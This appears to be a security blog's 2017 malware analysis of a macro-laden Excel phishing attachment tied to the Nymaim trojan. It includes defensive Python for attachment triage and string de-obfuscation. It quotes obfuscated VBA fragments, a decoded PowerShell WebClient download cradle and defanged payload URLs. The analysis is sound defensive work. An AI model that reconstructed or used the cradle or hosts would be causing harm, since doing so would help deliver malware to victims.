We recently discovered a malicious Excel file and ran it through VirusTotal: only fifteen anti-virus vendors detected it as malware (another case of the poor hit rate for AV):
The vendors that did detect it most commonly identified it as ‘X97M/Powmet’, and an online sandbox report gave us the following details:
This shows a number of important details, including malicious URLs and IP addresses. After receiving more samples (below) we ran further analysis, starting with the initial file: SHA-256 228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683
The file type detection tool shows it is a ‘POIFS’ document, i.e. an OLE2 compound file (POIFS is the Apache POI name for that format), so most likely an MS Office document.
Figure 1 POIFS document
OfficeMalScanner was the obvious choice for this file type, and it confirmed the file was an Excel document:
Figure 2 Excel file type
OfficeMalScanner detected an OLE2 compound format document, but its scan found no malicious traces (no shellcode patterns or embedded executables). Its ‘info’ mode extracts the VBA macro code and saves each module to a dump file:
Figure 3 VBMacro code Extraction
Figure 4 Extracted files
Now we can examine these files manually, especially the ‘ThisWorkbook’ module. Its code contains the malicious URL details in the following function:
Figure 5 ThisWorkbook
We tried the same technique with the other Excel files and URLs; these were also flagged as malicious:
Figure 6 VT Result for the link found inside the code
Figure 7 VT Result for downloaded file
Having confirmed the file was indeed malware, we downloaded the executable for analysis. Before going further, we checked whether any previous research had been carried out on this malware family and found it belongs to a banking trojan strain called ‘Nymaim’. Below is the content of one of the email samples:
Figure 8 Email as sample
Drilling down into the email content, we found the attachment-related information:
We then extracted that attachment body, which was base64-encoded, and decoded it:
Figure 9 before decoding
Figure 10 after decoding
Once decoded, the data begins with ‘PK’, the signature of a ZIP archive (the initials of PKZIP’s author, Phil Katz). After unzipping it we found it contained an Excel file, which we ran through the same analysis tools so we could compare its code with the previous file’s:
Figure 11 Extracted file from the email file
Figure 12 Extracted Macros inside the excel from email file
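The decode-and-unpack steps above (pull the base64 attachment out of the mail, check the magic bytes, unzip, hash what falls out) as an added example; this is not code from the original analysis, and the mail, the ZIP and the OLE2 stub standing in for the .xls are all constructed here rather than taken from the real sample:

```python
"""Offline triage of a mail attachment: decode the base64 body, identify the
container by its magic bytes, unpack a ZIP and hash every file inside it."""
import base64
import email
import hashlib
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Magic bytes of the two container formats seen in this analysis.
ZIP_MAGIC = b"PK\x03\x04"                        # ZIP local file header ("PK")
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 / POIFS compound document


def build_sample_eml() -> bytes:
    """Construct a sample message (not a real phishing mail): a base64 ZIP
    attachment holding a stub that carries the OLE2 header, standing in for
    the malicious .xls. Everything here is constructed test data."""
    fake_xls = OLE2_MAGIC + b"\x00" * 24  # constructed stand-in, not a real workbook
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.xls", fake_xls)
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    # add_attachment base64-encodes binary content, as the real mail was.
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="invoice.zip")
    return msg.as_bytes()


def identify(blob: bytes) -> str:
    """Classify a blob by its leading magic bytes."""
    if blob.startswith(ZIP_MAGIC):
        return "zip"
    if blob.startswith(OLE2_MAGIC):
        return "ole2"
    return "unknown"


def triage_eml(raw_eml: bytes) -> list:
    """Return one record per base64 attachment: name, container type, SHA-256,
    and (for ZIPs) the same details for each archived file."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if part.get("Content-Transfer-Encoding", "").lower() != "base64":
            continue
        # Manual decode of the transfer-encoded body, as done in the write-up.
        blob = base64.b64decode(part.get_payload())
        rec = {"name": part.get_filename(), "type": identify(blob),
               "sha256": hashlib.sha256(blob).hexdigest(), "contents": []}
        if rec["type"] == "zip":
            # Never execute or open the archive members; read bytes only.
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                for info in zf.infolist():
                    inner = zf.read(info)
                    rec["contents"].append({"name": info.filename,
                                            "type": identify(inner),
                                            "sha256": hashlib.sha256(inner).hexdigest()})
        findings.append(rec)
    return findings


if __name__ == "__main__":
    for rec in triage_eml(build_sample_eml()):
        print(rec["name"], rec["type"], rec["sha256"])
        for inner in rec["contents"]:
            print("  ", inner["name"], inner["type"], inner["sha256"])
```

The SHA-256 of the inner file is what you would submit to VirusTotal or search for in previous research, as was done with the initial sample; the macro extraction itself (OfficeMalScanner above, or olevba) is a separate step on the extracted .xls.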
We extracted the file’s macro and compared it to the previous file’s: both contained the same code:
The functions inside the code were heavily obfuscated. Strings are assembled from concatenated fragments, passed through StrReverse, and the result is then fed as input to another function.
For instance, the argument to the StrReverse call above is - "o^" + "D.^" + ")t^n" + "e^" + "il" + "cbe" + "w.^t^e" + "n." + "m^e^t^s" + "y^s" + " t^c" + "ej^bo^-" + "w^en^(^ ;"
Reversing ‘leopards’ (the result of that concatenation) gives the string “; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^o”. The ‘^’ characters are cmd.exe escape characters, which cmd.exe drops when it parses the command line, so what actually runs is “; (new-object system.net.webclient).Do”, the start of a PowerShell System.Net.WebClient call used to download a file (the carets suggest PowerShell is launched via cmd.exe). This string is passed on to bugersfoot(), and bugersfoot() is in turn used by other functions; the chain keeps going and makes static reversing tedious. The most efficient way for us to proceed was to step through the code in the VBA editor and observe its behaviour:
Here avromit is ferdomon concatenated with some other strings. Looking at the fragments, “h+tt+p…” is nothing but http://, and the expression also references a function ‘tmauw’ and the file name news.exe, so we checked what ‘tmauw’ returns.
It resolves to hxxp://bifoop(.)com/news.exe, which is flagged as malicious by many AV vendors. Another interesting function yielded a further URL, so we examined that function too:
In this function we can see the http prefix, but the noterdams and derfrop functions have to be resolved to recover the host:
It contacts hxxp://pasicnyk(.)com, a clearly malicious domain.
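The dynamic approach above (run the macro and watch what it does) is the quickest route, but the string-building pattern is simple enough to undo statically, which is useful when the sample cannot be executed or when many variants share the same scheme. The following is an added example, not code from the original analysis: it joins the VBA string literals of a concatenation expression, applies StrReverse where the macro does, and strips the cmd.exe ‘^’ escapes. The first input is the StrReverse argument quoted earlier; the second, in the “h” + “tt” + “p” style, is constructed for illustration and does not use the real fragments or domains from the sample.

```python
"""Static de-obfuscation of the macro's string-building pattern: VBA string
fragments joined with + (or &), optionally wrapped in StrReverse(), whose
result is handed to cmd.exe, which discards ^ escape characters."""
import re

# One VBA string literal; a doubled quote "" inside a literal is an escaped quote.
_LITERAL = re.compile(r'"((?:[^"]|"")*)"')


def vba_concat(expr: str) -> str:
    """Join the string literals of a VBA concatenation expression such as
    "h" + "tt" + "p" in source order. Variables and function calls between
    the literals are ignored, so only the static part is recovered."""
    return "".join(m.group(1).replace('""', '"') for m in _LITERAL.finditer(expr))


def strreverse(s: str) -> str:
    """VBA StrReverse: reverse the character order."""
    return s[::-1]


def strip_cmd_escapes(s: str) -> str:
    """cmd.exe treats ^ as an escape: the caret is dropped and the following
    character is taken literally (so ^^ becomes ^). A trailing lone ^ is dropped."""
    out = []
    i = 0
    while i < len(s):
        if s[i] == "^":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def deobfuscate(expr: str, reverse: bool = False) -> str:
    """Concatenate, optionally StrReverse, then remove cmd.exe escapes."""
    s = vba_concat(expr)
    if reverse:
        s = strreverse(s)
    return strip_cmd_escapes(s)


# The StrReverse argument quoted in the analysis above.
LEOPARDS_EXPR = ('"o^" + "D.^" + ")t^n" + "e^" + "il" + "cbe" + "w.^t^e" + "n." + '
                 '"m^e^t^s" + "y^s" + " t^c" + "ej^bo^-" + "w^en^(^ ;"')

# Constructed illustration of the "h" + "tt" + "p" pattern (not the real URL
# fragments from the sample): plain concatenation, no StrReverse.
URL_EXPR = '"h" + "tt" + "p" + "://" + "example" + ".invalid/" + "news.exe"'

if __name__ == "__main__":
    print(deobfuscate(LEOPARDS_EXPR, reverse=True))  # ; (new-object system.net.webclient).Do
    print(deobfuscate(URL_EXPR))                     # http://example.invalid/news.exe
```

Because only literals are joined, a fragment that comes from a variable or another function (such as ‘tmauw’ above) shows up as a gap in the output; that gap tells you which function to resolve next, which is exactly the chain the analysis followed by hand.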
Conclusion
As usual, we recommend disabling macros in MS Office documents, or at minimum blocking macros in files that originate from the internet. Always be cautious with email attachments, particularly from unknown senders. Finally, we recommend blocking the malicious URLs and domains above at the firewall and proxy.
On 2017-07-19